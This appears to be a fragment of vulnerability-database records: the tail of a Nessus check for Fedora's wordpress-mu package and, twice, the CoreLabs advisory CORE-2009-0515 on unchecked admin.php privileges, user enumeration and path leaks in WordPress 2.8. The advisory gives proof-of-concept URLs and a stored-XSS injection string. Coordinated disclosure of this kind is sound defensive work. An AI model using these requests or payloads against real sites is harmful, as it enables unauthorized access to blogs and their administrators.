eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^11([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 11.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC11\", reference:\"wordpress-mu-2.8.4a-1.fc11\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wordpress-mu\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:33", "bulletinFamily": "software", "cvelist": ["CVE-2009-2334", "CVE-2009-2335", "CVE-2009-2336"], "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 1, "modified": "2009-07-09T00:00:00", "published": "2009-07-09T00:00:00", "id": "SECURITYVULNS:VULN:10056", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10056", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:30", "bulletinFamily": "software", "cvelist": ["CVE-2008-0196", "CVE-2009-2334", "CVE-2009-2335", "CVE-2009-2336"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n Core Security Technologies - CoreLabs Advisory\r\n http://www.coresecurity.com/corelabs/\r\n\r\nWordPress Privileges Unchecked in admin.php and Multiple Information\r\nDisclosures\r\n\r\n\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: WordPress Privileges Unchecked in admin.php and Multiple\r\nInformation Disclosures\r\nAdvisory ID: CORE-2009-0515\r\nAdvisory URL:\r\nhttp://corelabs.coresecurity.com/index.php?action=view&type=advisory&name=WordPress_Privileges_Unchecked\r\nDate published: 2009-07-08\r\nDate of last update: 2009-07-08\r\nVendors contacted: WordPress\r\nRelease mode: Coordinated release\r\n\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Local file include, Privileges unchecked, Cross site scripting\r\n(XSS), Information disclosure\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nBugtraq ID: 35581, 35584\r\nCVE Name: CVE-2009-2334, CVE-2009-2335, CVE-2009-2336\r\n\r\n\r\n3. *Vulnerability Description*\r\n\r\nWordPress is a web application written in PHP that allows the easy\r\ninstallation of a flexible weblog on any computer connected to the\r\nInternet. WordPress 2.7 reached more than 6 million downloads during\r\nJune 2009 [9].\r\n\r\nA vulnerability was found in the way that WordPress handles some URL\r\nrequests. This results in unprivileged users viewing the content of\r\nplugins configuration pages, and also in some plugins modifying plugin\r\noptions and injecting JavaScript code. Arbitrary native code may be run\r\nby a malicious attacker if the blog administrator runs injected\r\nJavasScript code that edits blog PHP code. Many WordPress-powered blogs,\r\nhosted outside 'wordpress.com', allow any person to create unprivileged\r\nusers called subscribers. Other sensitive username information\r\ndisclosures were found in WordPress.\r\n\r\n\r\n4. *Vulnerable packages*\r\n\r\n . WordPress 2.8 and previous\r\n . WordPress MU 2.7.1 and previous, used in WordPress.com\r\n\r\n\r\n5. *Non-vulnerable packages*\r\n\r\n . WordPress 2.8.1\r\n . WordPress MU 2.8.1, used in WordPress.com\r\n\r\n\r\n6. *Vendor Information, Solutions and Workarounds*\r\n\r\nMitigation for the Privileges Unchecked vulnerability (suggested by Core\r\nSecurity): this vulnerability may be mitigated by controlling access to\r\nfiles inside the 'wp-admin' folder. Access can be prohibited by using\r\nApache access control mechanism ('.htaccess' file), see guideline for\r\nmore information [11].\r\n\r\n\r\n7. *Credits*\r\n\r\nThese vulnerabilities were discovered and researched by Fernando\r\nArnaboldi and José Orlicki from Core Security Technologies. Further\r\nresearch was made by Jose Orlicki from Core Security Technologies.\r\n\r\n\r\n8. *Technical Description / Proof of Concept Code*\r\n\r\n\r\n8.1. *Introduction*\r\n\r\nIn the last few years several security bugs were found in WordPress\r\n[1][2]. During 2008, the big amount of bugs reported by researchers lead\r\nto exploitation by blog spammers [3]. During 2009, a new round of\r\nattacks has appeared and security researchers are reporting new bugs or\r\nwrongly fixed previously-reported bugs [4][5]. A path traversal in local\r\nfiles included by 'admin.php' has been fixed [6][7] but, in our case, we\r\nreport that administrative privileges are still unchecked when accessing\r\nany PHP file inside a plugin folder.\r\n\r\n\r\n8.2. *Access Control Roles*\r\n\r\nWordPress has a privilege model where any user has an assigned role [8].\r\nRegarding plugins only users characterized by the role Administrator can\r\nactivate plugins. Notice that only the blog hosting owner can add new\r\nplugins because these must by copied inside the host filesystem. The\r\nroles Editor, Author or Subscriber (the latter has the least privileges)\r\ncannot activate plugins, edit plugins, update plugins nor delete plugins\r\ninstalled by an Administrator. Besides that, the configuration of\r\nspecific plugins is a grey area because there is no distinguished\r\ncapability assigned [8].\r\n\r\nAlso due to cross-site scripting vulnerabilities inside plugins options\r\n(something very common), non-administrative users reconfiguring plugins\r\nmay inject persistent JavaScript code. Possibly arbitrary native code\r\ncan be executed by the attacker if the blog administrator runs injected\r\nJavasScript code that injects PHP code. It is important to observe that\r\nmany WordPress-powered blogs are configured to allow any blog visitor to\r\ncreate a Subscriber user without confirmation from the Administrator\r\nrole inside the following URL, although by default the Administrator\r\nrole must create these new users.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-login.php?action=register\r\n- -----------/\r\n\r\n This can be modified by the administrator in 'Membership/Anyone can\r\nregister'.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-admin/options-general.php\r\n- -----------/\r\n\r\n\r\n\r\n\r\n8.3. *Privileges Unchecked in admin.php?page= Plugin Local File Includes\r\n(CVE-2009-2334, BID 35581)*\r\n\r\nNo privileges are checked on WordPress plugins configuration PHP modules\r\nusing parameter 'page' when we replace 'options-general.php' with\r\n'admin.php'. The same thing happens when replacing other modules such as\r\n'plugins.php' with 'admin.php'. Basic information disclosure is done\r\nthis way. For example, with the following URL a user with no privileges\r\ncan see the configuration of plugin Collapsing Archives, if installed.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-admin/admin.php?page=/collapsing-archives/options.txt\r\n- -----------/\r\n\r\n Instead of the following allowed URL.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-admin/options-general.php?page=collapsing-archives/options.txt\r\n- -----------/\r\n\r\n Another example of this information disclosure is shown on Akismet, a\r\nplugin shipped by default with WordPress.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-admin/admin.php?page=akismet/readme.txt\r\n- -----------/\r\n\r\n All plugins we have tested are vulnerable to this kind of information\r\ndisclosure, but in many of them the PHP files accessed just crashed. On\r\nthe other hand, for example, with capability 'import', privileges are\r\nchecked inside 'admin.php':\r\n\r\n/-----------\r\n\r\nif ( ! current_user_can('import') )\r\n wp_die(__('You are not allowed to import.'));\r\n- -----------/\r\n\r\n More dangerous scenarios exist, all of them can be exploited by users\r\nwith the Subscriber role, the least privileged.\r\n\r\n\r\n8.4. *Abuse example: XSS in plugin configuration module*\r\n\r\nIf installed, *Related Ways To Take Action* is an example of a WordPress\r\nplugin that is affected by many cross-site scripting vulnerabilities\r\n(XSS) that can be leveraged by an attacker using the unchecked\r\nprivileges described in this advisory to inject persistent JavaScript\r\ncode. Possibly, arbitrary native code can be executed by the attacker if\r\nthe blog administrator, when he/she logs in, runs injected JavasScript\r\ncode that edits blog PHP code. The original URL for reconfiguring the\r\nplugin can be accessed only by the Administrator role.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wordpress/wp-admin/options-general.php?page=related-ways-to-take-action/options.php\r\n- -----------/\r\n\r\n But replacing the PHP file with the generic 'admin.php' any blog user\r\ncan modify this configuration.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-admin/admin.php?page=related-ways-to-take-action/options.php\r\n- -----------/\r\n\r\n The following JavaScript injection can be entered within field *Exclude\r\nactions by term* to exemplify this kind of abuse. When the administrator\r\nenters the same page the injected browser code will be executed and\r\npossibly blog PHP can be modified to run arbitrary native code.\r\n\r\n/-----------\r\n\r\n\"/><script>alert(String.fromCharCode(88)+String.fromCharCode(83)+String.fromCharCode(83))</script><ahref="\r\n\r\n- -----------/\r\n\r\n This is the worst scenario that we found for the vulnerability.\r\n\r\n\r\n8.5. *Abuse example: viewing WP Security Scanner Plugin Dashboard*\r\n\r\nIf installed, the WordPress Security Scanner Plugin dashboard can be\r\nviewed similarly by any user besides the administrator using the plugin\r\nconfiguration page URL without modification. This dashboard includes\r\ncommon default blog configuration settings that are insecure and should\r\nbe modified by the blog administrator or hosting.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-admin/admin.php?page=wp-security-scan/securityscan.php\r\n- -----------/\r\n\r\n\r\n\r\n\r\n8.6. *Abuse example: reconfiguring WP-IDS, a WordPress Hardening Project*\r\n\r\nIf installed, the *Intrusion Detection System Plugin (WPIDS)*[10] can be\r\nreconfigured accessed with the same vulnerability.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-admin/index.php?page=wp-ids/ids-admin.php\r\n- -----------/\r\n\r\n This gives an attacker the possibility to disable many features of the\r\nplugin, for example reactivate the forgotten password feature and\r\nreactivate the XML-RPC blog interface. Also you can deny the weblog\r\nservice by configuring this plugin to be overly sensitive, blocking any\r\nrequest. However the plugin cannot be totally disabled because the\r\nessential IDS parameters 'Maximum impact to ignore bad requests' and\r\n'Minimum impact to sanitize bad requests' are verified on the server\r\nside of the blog and cannot be distorted to deactivate the sanitizing or\r\nblocking features of the web IDS plugin.\r\n\r\n\r\n8.7. *Other Information Disclosures (CVE-2009-2335, CVE-2009-2336, BID\r\n35584)*\r\n\r\nWordPress discriminates bad password from bad user logins, this reduces\r\nthe complexity of a brute force attack on WordPress blogs login\r\n(CVE-2009-2335, BID 35584). The same user information disclosure happens\r\nwhen users use the forgotten mail interface to request a new password\r\n(CVE-2009-2336, same BID 35584). These information disclosures seem to\r\nbe previously reported [6] but the WordPress team is refusing to modify\r\nthem alleging *user convenience*.\r\n\r\nDefault installation of WordPress 2.7.1 leaks the name of the user\r\nposting entries inside the HTML of the blog.\r\n\r\n/-----------\r\n\r\n <small>June 3rd, 2009 <!-- by leakedusername --></small>\r\n- -----------/\r\n\r\n\r\n\r\nAlso several administrative modules give to anyone the complete path\r\nwhere the web application is hosted inside the server. This may simplify\r\nor enable other malicious attacks. An example follows.\r\n\r\n/-----------\r\n\r\nhttp://[some_wordpress_blog]/wp-settings.php\r\n- -----------/\r\n\r\n\r\n\r\n/-----------\r\n\r\nNotice: Use of undefined constant ABSPATH - assumed 'ABSPATH' in\r\n[WP_LEAKED_PATH]\wp-settings.php on line 110\r\nNotice: Use of undefined constant ABSPATH - assumed 'ABSPATH' in\r\n[WP_LEAKED_PATH]\wp-settings.php on line 112\r\nWarning: require(ABSPATHwp-includes/compat.php) [function.require]:\r\nfailed to open stream:\r\nNo such file or directory in [WP_LEAKED_PATH]\wp-settings.php on line 246\r\nFatal error: require() [function.require]: Failed opening required\r\n'ABSPATHwp-includes/compat.php'\r\n(include_path='.;[PHP_LEAKED_PATH]\php5\pear') in\r\n[WP_LEAKED_PATH]\wp-settings.php on line 246\r\n\r\n- -----------/\r\n\r\n\r\n\r\n\r\n9. *Report Timeline*\r\n\r\n. 2009-06-04:\r\nCore Security Technologies notifies the WordPress team of the\r\nvulnerabilities (security@wordpress.org) and offers a technical\r\ndescription encrypted or in plain-text. Advisory is planned for\r\npublication on June 22th.\r\n\r\n. 2009-06-08:\r\nCore notifies again the WordPress team of the vulnerability.\r\n\r\n. 2009-06-10:\r\nThe WordPress team asks Core for a technical description of the\r\nvulnerability in plain-text.\r\n\r\n. 2009-06-11:\r\nTechnical details sent to WordPress team by Core.\r\n\r\n. 2009-06-11:\r\nWordPress team notifies Core that a fix was produced and is available to\r\nCore for testing. WordPress team asserts that password and username\r\ndiscrimination as well as username leakage are known and will not be\r\nfixed because they are convenient for the users.\r\n\r\n. 2009-06-12:\r\nCore tells the WordPress team that the patch will be tested by Core as a\r\ncourtesy as soon as possible. It also requests confirmation that\r\nWordPress versions 2.8 and earlier, and WordPress.com, are vulnerable to\r\nthe flaws included in the advisory draft CORE-2009-0515.\r\n\r\n. 2009-06-12:\r\nWordPress team confirms that WordPress 2.8 and earlier plus\r\nWordPress.com are vulnerable to the flaws included in the advisory draft.\r\n\r\n. 2009-06-17:\r\nCore informs the WordPress team that the patch is only fixing one of the\r\nfour proof of concept abuses included in the advisory draft. Core\r\nreminds the WordPress team that the advisory is scheduled to be\r\npublished on June 22th but a new schedule can be discussed.\r\n\r\n. 2009-06-19:\r\nCore asks for a new patched version of WordPress, if available, and\r\nnotifies the WordPress team that the publication of the advisory was\r\nre-scheduled to June 30th.\r\n\r\n. 2009-06-19:\r\nWordPress team confirms they have a new patch that has the potential to\r\nbreak a lot of plugins.\r\n\r\n. 2009-06-29:\r\nWordPress team asks for a delayance on advisory CORE-2009-0515\r\npublication until July 6th, when WordPress MU version will be patched.\r\n\r\n. 2009-06-29:\r\nCore agrees to delay publication of advisory CORE-2009-0515 until July 6th.\r\n\r\n. 2009-06-29:\r\nCore tells the WordPress team that other administrative PHP modules can\r\nalso be rendered by non-administrative users, such as module\r\n'admin-post.php' and 'link-parse-opml.php'.\r\n\r\n. 2009-07-02:\r\nWordPress team comments that 'admin.php' and 'admin-post.php' are\r\nintentionally open and plugins can choose to hook either privileged or\r\nunprivileged actions. They also comment that unprivileged access to\r\n'link-parse-opml.php' is benign but having this file open is bad form.\r\n\r\n. 2009-07-02:\r\nCore sends the WordPress team a new draft of the advisory and comments\r\nthat there is no capability specified in Worpress documentation for\r\nconfiguring plugins. Also control of actions registered by plugins is\r\nnot enforced. Core also notices that the privileges unchecked bug in\r\n'admin.php?page=' is fixed on WordPress 2.8.1-beta2 latest development\r\nrelease.\r\n\r\n. 2009-07-06:\r\nCore requests WordPress confirmation of the release date of WordPress\r\n2.8.1 and WordPress MU 2.8.\r\n\r\n. 2009-07-07:\r\nWordPress team confirms that a release candidate of WordPress 2.8.1 is\r\nmade available to users and that the advisory may be published.\r\n\r\n. 2009-07-06:\r\nCore requests WordPress confirmation of the release date of WordPress MU\r\nand WordPress MU new version numbers.\r\n\r\n. 2009-07-07:\r\nWordPress team release WordPress 2.8.1 RC1 to its users.\r\n\r\n. 2009-07-08:\r\nWordPress team confirms that WordPress MU 2.8.1 will be made available\r\nas soon WordPress 2.8.1 is officially released. Probably July 8th or 9th.\r\n\r\n. 2009-07-08:\r\nThe advisory CORE-2009-0515 is published.\r\n\r\n\r\n\r\n10. *References*\r\n\r\n[1] WordPress vulnerabilities in CVE database\r\nhttp://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wordpress\r\n[2] SecuriTeam List of WordPress Vulnerabilities\r\nhttp://www.securiteam.com/products/W/Wordpress.html\r\n[3] WordPress Vulnerability - YBO Interactive Blog\r\nhttp://www.ybo-interactive.com/blog/2008/03/30/wordpress-vulnerability/\r\n[4] bablooO/blyat attacks on WP 2.7.0 and 2.7.1\r\nhttp://wordpress.org/support/topic/280748\r\n[5] Security breach - xkcd blog\r\nhttp://blag.xkcd.com/2009/06/18/security-breach/\r\n[6] securityvulns.com WordPress vulnerabilities digest in English\r\nhttp://www.securityfocus.com/archive/1/archive/1/485786/100/0/threaded\r\n[7] CVE-2008-0196\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0196\r\n[8] WordPress Roles and Capabilities\r\nhttp://codex.wordpress.org/Roles_and_Capabilities\r\n[9] WordPress Download Counter\r\nhttp://wordpress.org/download/counter/\r\n[10] WordPress Intrusion Detection System Plugin\r\nhttp://php-ids.org/2008/02/21/wpids-version-012-released/\r\n[11] Hardening WordPress with htaccess\r\nhttp://blogsecurity.net/wordpress/article-210607\r\n\r\n\r\n11. *About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://www.coresecurity.com/corelabs.\r\n\r\n\r\n12. *About Core Security Technologies*\r\n\r\nCore Security Technologies develops strategic solutions that help\r\nsecurity-conscious organizations worldwide develop and maintain a\r\nproactive process for securing their networks. The company's flagship\r\nproduct, CORE IMPACT, is the most comprehensive product for performing\r\nenterprise security assurance testing. CORE IMPACT evaluates network,\r\nendpoint and end-user vulnerabilities and identifies what resources are\r\nexposed. It enables organizations to determine if current security\r\ninvestments are detecting and preventing attacks. Core Security\r\nTechnologies augments its leading technology solution with world-class\r\nsecurity consulting services, including penetration testing and software\r\nsecurity auditing. Based in Boston, MA and Buenos Aires, Argentina, Core\r\nSecurity Technologies can be reached at 617-399-6980 or on the Web at\r\nhttp://www.coresecurity.com.\r\n\r\n\r\n13. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2009 Core Security\r\nTechnologies and (c) 2009 CoreLabs, and may be distributed freely\r\nprovided that no fee is charged for this distribution and proper credit\r\nis given.\r\n\r\n\r\n14. *PGP/GPG Keys*\r\n\r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.6 (MingW32)\r\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org\r\n\r\niD8DBQFKVR7gyNibggitWa0RAin3AKCOrLLQ8XZnrCLot5d9xoZW6sdWwwCfTJ4N\r\nTPRpR0Gn0WqmF8HOeDslbA8=\r\n=zEDK\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2009-07-09T00:00:00", "published": "2009-07-09T00:00:00", "id": "SECURITYVULNS:DOC:22142", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22142", "title": "CORE-2009-01515 - WordPress Privileges Unchecked in admin.php and Multiple Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:05:05", "description": "\nWordPress Core MU Plugins - admin.php Privileges Unchecked Multiple Information Disclosures", "edition": 1, "published": "2009-07-10T00:00:00", "title": "WordPress Core MU Plugins - admin.php Privileges Unchecked Multiple Information Disclosures", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-0196", "CVE-2009-2334", "CVE-2009-2335", "CVE-2009-2336"], "modified": "2009-07-10T00:00:00", "id": "EXPLOITPACK:EA9973B6F5F19BFE8F3E86AA281A9086", "href": "", "sourceData": "-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n Core Security Technologies - CoreLabs Advisory\n http://www.coresecurity.com/corelabs/\n\nWordPress Privileges Unchecked in admin.php and Multiple Information\nDisclosures\n\n\n\n1. *Advisory Information*\n\nTitle: WordPress Privileges Unchecked in admin.php and Multiple\nInformation Disclosures\nAdvisory ID: CORE-2009-0515\nAdvisory URL:\nhttp://corelabs.coresecurity.com/index.php?action=view&type=advisory&name=WordPress_Privileges_Unchecked\nDate published: 2009-07-08\nDate of last update: 2009-07-08\nVendors contacted: WordPress\nRelease mode: Coordinated release\n\n\n2. *Vulnerability Information*\n\nClass: Local file include, Privileges unchecked, Cross site scripting\n(XSS), Information disclosure\nRemotely Exploitable: Yes\nLocally Exploitable: No\nBugtraq ID: 35581, 35584\nCVE Name: CVE-2009-2334, CVE-2009-2335, CVE-2009-2336\n\n\n3. *Vulnerability Description*\n\nWordPress is a web application written in PHP that allows the easy\ninstallation of a flexible weblog on any computer connected to the\nInternet. WordPress 2.7 reached more than 6 million downloads during\nJune 2009 [9].\n\nA vulnerability was found in the way that WordPress handles some URL\nrequests. This results in unprivileged users viewing the content of\nplugins configuration pages, and also in some plugins modifying plugin\noptions and injecting JavaScript code. Arbitrary native code may be run\nby a malicious attacker if the blog administrator runs injected\nJavasScript code that edits blog PHP code. Many WordPress-powered blogs,\nhosted outside 'wordpress.com', allow any person to create unprivileged\nusers called subscribers. Other sensitive username information\ndisclosures were found in WordPress.\n\n\n4. *Vulnerable packages*\n\n . WordPress 2.8 and previous\n . WordPress MU 2.7.1 and previous, used in WordPress.com\n\n\n5. *Non-vulnerable packages*\n\n . WordPress 2.8.1\n . WordPress MU 2.8.1, used in WordPress.com\n\n\n6. *Vendor Information, Solutions and Workarounds*\n\nMitigation for the Privileges Unchecked vulnerability (suggested by Core\nSecurity): this vulnerability may be mitigated by controlling access to\nfiles inside the 'wp-admin' folder. Access can be prohibited by using\nApache access control mechanism ('.htaccess' file), see guideline for\nmore information [11].\n\n\n7. *Credits*\n\nThese vulnerabilities were discovered and researched by Fernando\nArnaboldi and Jos\u00c3\u00a9 Orlicki from Core Security Technologies. Further\nresearch was made by Jose Orlicki from Core Security Technologies.\n\n\n8. *Technical Description / Proof of Concept Code*\n\n\n8.1. *Introduction*\n\nIn the last few years several security bugs were found in WordPress\n[1][2]. During 2008, the big amount of bugs reported by researchers lead\nto exploitation by blog spammers [3]. During 2009, a new round of\nattacks has appeared and security researchers are reporting new bugs or\nwrongly fixed previously-reported bugs [4][5]. A path traversal in local\nfiles included by 'admin.php' has been fixed [6][7] but, in our case, we\nreport that administrative privileges are still unchecked when accessing\nany PHP file inside a plugin folder.\n\n\n8.2. *Access Control Roles*\n\nWordPress has a privilege model where any user has an assigned role [8].\nRegarding plugins only users characterized by the role Administrator can\nactivate plugins. Notice that only the blog hosting owner can add new\nplugins because these must by copied inside the host filesystem. The\nroles Editor, Author or Subscriber (the latter has the least privileges)\ncannot activate plugins, edit plugins, update plugins nor delete plugins\ninstalled by an Administrator. Besides that, the configuration of\nspecific plugins is a grey area because there is no distinguished\ncapability assigned [8].\n\nAlso due to cross-site scripting vulnerabilities inside plugins options\n(something very common), non-administrative users reconfiguring plugins\nmay inject persistent JavaScript code. Possibly arbitrary native code\ncan be executed by the attacker if the blog administrator runs injected\nJavasScript code that injects PHP code. It is important to observe that\nmany WordPress-powered blogs are configured to allow any blog visitor to\ncreate a Subscriber user without confirmation from the Administrator\nrole inside the following URL, although by default the Administrator\nrole must create these new users.\n\n/-----------\n\nhttp://[some_wordpress_blog]/wp-login.php?action=register\n- -----------/\n\n This can be modified by the administrator in 'Membership/Anyone can\nregister'.\n\n/-----------\n\nhttp://[some_wordpress_blog]/wp-admin/options-general.php\n- -----------/\n\n\n\n\n8.3. *Privileges Unchecked in admin.php?page= Plugin Local File Includes\n(CVE-2009-2334, BID 35581)*\n\nNo privileges are checked on WordPress plugins configuration PHP modules\nusing parameter 'page' when we replace 'options-general.php' with\n'admin.php'. The same thing happens when replacing other modules such as\n'plugins.php' with 'admin.php'. Basic information disclosure is done\nthis way. For example, with the following URL a user with no privileges\ncan see the configuration of plugin Collapsing Archives, if installed.\n\n/-----------\n\nhttp://[some_wordpress_blog]/wp-admin/admin.php?page=/collapsing-archives/options.txt\n- -----------/\n\n Instead of the following allowed URL.\n\n/-----------\n\nhttp://[some_wordpress_blog]/wp-admin/options-general.php?page=collapsing-archives/options.txt\n- -----------/\n\n Another example of this information disclosure is shown on Akismet, a\nplugin shipped by default with WordPress.\n\n/-----------\n\nhttp://[some_wordpress_blog]/wp-admin/admin.php?page=akismet/readme.txt\n- -----------/\n\n All plugins we have tested are vulnerable to this kind of information\ndisclosure, but in many of them the PHP files accessed just crashed. On\nthe other hand, for example, with capability 'import', privileges are\nchecked inside 'admin.php':\n\n/-----------\n\nif ( ! current_user_can('import') )\n wp_die(__('You are not allowed to import.'));\n- -----------/\n\n More dangerous scenarios exist, all of them can be exploited by users\nwith the Subscriber role, the least privileged.\n\n\n8.4. *Abuse example: XSS in plugin configuration module*\n\nIf installed, *Related Ways To Take Action* is an example of a WordPress\nplugin that is affected by many cross-site scripting vulnerabilities\n(XSS) that can be leveraged by an attacker using the unchecked\nprivileges described in this advisory to inject persistent JavaScript\ncode. Possibly, arbitrary native code can be executed by the attacker if\nthe blog administrator, when he/she logs in, runs injected JavasScript\ncode that edits blog PHP code. The original URL for reconfiguring the\nplugin can be accessed only by the Administrator role.\n\n/-----------\n\nhttp://[some_wordpress_blog]/wordpress/wp-admin/options-general.php?page=related-ways-to-take-action/options.php\n- -----------/\n\n But replacing the PHP file with the generic 'admin.php' any blog user\ncan modify this configuration.\n\n/-----------\n\nhttp://[some_wordpress_blog]/wp-admin/admin.php?page=related-ways-to-take-action/options.php\n- -----------/\n\n The following JavaScript injection can be entered within field *Exclude\nactions by term* to exemplify this kind of abuse. When the administrator\nenters the same page the injected browser code will be executed and\npossibly blog PHP can be modified to run arbitrary native code.\n\n/-----------\n\n\\\"/><script>alert(String.fromCharCode(88)+String.fromCharCode(83)+String.fromCharCode(83))</script><ahref=\"\n\n- -----------/\n\n This is the worst scenario that we found for the vulnerability.\n\n\n8.5. *Abuse example: viewing WP Security Scanner Plugin Dashboard*\n\nIf installed, the WordPress Security Scanner Plugin dashboard can be\nviewed similarly by any user besides the administrator using the plugin\nconfiguration page URL without modification. This dashboard includes\ncommon default blog configuration settings that are insecure and should\nbe modified by the blog administrator or hosting.\n\n/-----------\n\nhttp://[some_wordpress_blog]/wp-admin/admin.php?page=wp-security-scan/securityscan.php\n- -----------/\n\n\n\n\n8.6. *Abuse example: reconfiguring WP-IDS, a WordPress Hardening Project*\n\nIf installed, the *Intrusion Detection System Plugin (WPIDS)*[10] can be\nreconfigured accessed with the same vulnerability.\n\n/-----------\n\nhttp://[some_wordpress_blog]/wp-admin/index.php?page=wp-ids/ids-admin.php\n- -----------/\n\n This gives an attacker the possibility to disable many features of the\nplugin, for example reactivate the forgotten password feature and\nreactivate the XML-RPC blog interface. Also you can deny the weblog\nservice by configuring this plugin to be overly sensitive, blocking any\nrequest. However the plugin cannot be totally disabled because the\nessential IDS parameters 'Maximum impact to ignore bad requests' and\n'Minimum impact to sanitize bad requests' are verified on the server\nside of the blog and cannot be distorted to deactivate the sanitizing or\nblocking features of the web IDS plugin.\n\n\n8.7. *Other Information Disclosures (CVE-2009-2335, CVE-2009-2336, BID\n35584)*\n\nWordPress discriminates bad password from bad user logins, this reduces\nthe complexity of a brute force attack on WordPress blogs login\n(CVE-2009-2335, BID 35584). The same user information disclosure happens\nwhen users use the forgotten mail interface to request a new password\n(CVE-2009-2336, same BID 35584). These information disclosures seem to\nbe previously reported [6] but the WordPress team is refusing to modify\nthem alleging *user convenience*.\n\nDefault installation of WordPress 2.7.1 leaks the name of the user\nposting entries inside the HTML of the blog.\n\n/-----------\n\n <small>June 3rd, 2009 <!-- by leakedusername --></small>\n- -----------/\n\n\n\nAlso several administrative modules give to anyone the complete path\nwhere the web application is hosted inside the server. This may simplify\nor enable other malicious attacks. An example follows.\n\n/-----------\n\nhttp://[some_wordpress_blog]/wp-settings.php\n- -----------/\n\n\n\n/-----------\n\nNotice: Use of undefined constant ABSPATH - assumed 'ABSPATH' in\n[WP_LEAKED_PATH]\\wp-settings.php on line 110\nNotice: Use of undefined constant ABSPATH - assumed 'ABSPATH' in\n[WP_LEAKED_PATH]\\wp-settings.php on line 112\nWarning: require(ABSPATHwp-includes/compat.php) [function.require]:\nfailed to open stream:\nNo such file or directory in [WP_LEAKED_PATH]\\wp-settings.php on line 246\nFatal error: require() [function.require]: Failed opening required\n'ABSPATHwp-includes/compat.php'\n(include_path='.;[PHP_LEAKED_PATH]\\php5\\pear') in\n[WP_LEAKED_PATH]\\wp-settings.php on line 246\n\n- -----------/\n\n\n\n\n9. *Report Timeline*\n\n. 2009-06-04:\nCore Security Technologies notifies the WordPress team of the\nvulnerabilities (security@wordpress.org) and offers a technical\ndescription encrypted or in plain-text. Advisory is planned for\npublication on June 22th.\n\n. 2009-06-08:\nCore notifies again the WordPress team of the vulnerability.\n\n. 2009-06-10:\nThe WordPress team asks Core for a technical description of the\nvulnerability in plain-text.\n\n. 2009-06-11:\nTechnical details sent to WordPress team by Core.\n\n. 2009-06-11:\nWordPress team notifies Core that a fix was produced and is available to\nCore for testing. WordPress team asserts that password and username\ndiscrimination as well as username leakage are known and will not be\nfixed because they are convenient for the users.\n\n. 2009-06-12:\nCore tells the WordPress team that the patch will be tested by Core as a\ncourtesy as soon as possible. It also requests confirmation that\nWordPress versions 2.8 and earlier, and WordPress.com, are vulnerable to\nthe flaws included in the advisory draft CORE-2009-0515.\n\n. 2009-06-12:\nWordPress team confirms that WordPress 2.8 and earlier plus\nWordPress.com are vulnerable to the flaws included in the advisory draft.\n\n. 2009-06-17:\nCore informs the WordPress team that the patch is only fixing one of 